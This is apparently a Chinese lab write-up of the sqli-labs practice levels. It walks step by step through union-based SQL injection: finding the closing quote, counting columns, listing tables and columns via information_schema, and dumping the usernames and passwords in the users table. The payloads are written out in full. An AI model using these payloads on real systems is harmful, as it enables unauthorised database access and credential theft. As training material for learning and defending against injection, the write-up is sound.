本文共 2185 字,大约阅读时间需要 7 分钟。
第一步:判断闭合符号,输入单引号,看看是否报错,这里就报错了,当然注释符有好多种('
、"
、#
、--+
)这里输入单引号就行了,报错了。
?id=1'
?id=1' order by 1--+
?id=0' union select 1,2,database()--+
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
看到了,那么大的username,password😁😁
?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+
0x3a意思是“:
”
第一步:还是先判断有无闭合符号,然后输入?id=1'
'
单引号了。 就不再重复了,我把结果放出来吧,证明是可行的。😜😜😜 第三关和前面一样,只是闭合符号又不一样这次的是,看圆括号
上面是一条华丽的分界线,进行下一关
第一步仍然是判断闭合符号,先判断单引号
?id=1") order by 1--+
还是到4报错了,
?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
where table_schema=database()
就是从table_schema=database(),这个库里直接爆表,也是可以的。目前刚了解到,还是先老老实实的爆先爆库名。 继续继续hhh,爆列: ?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
跟前几关一样了
?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+
OK,收工~
转载地址:http://ppshz.baihongyu.com/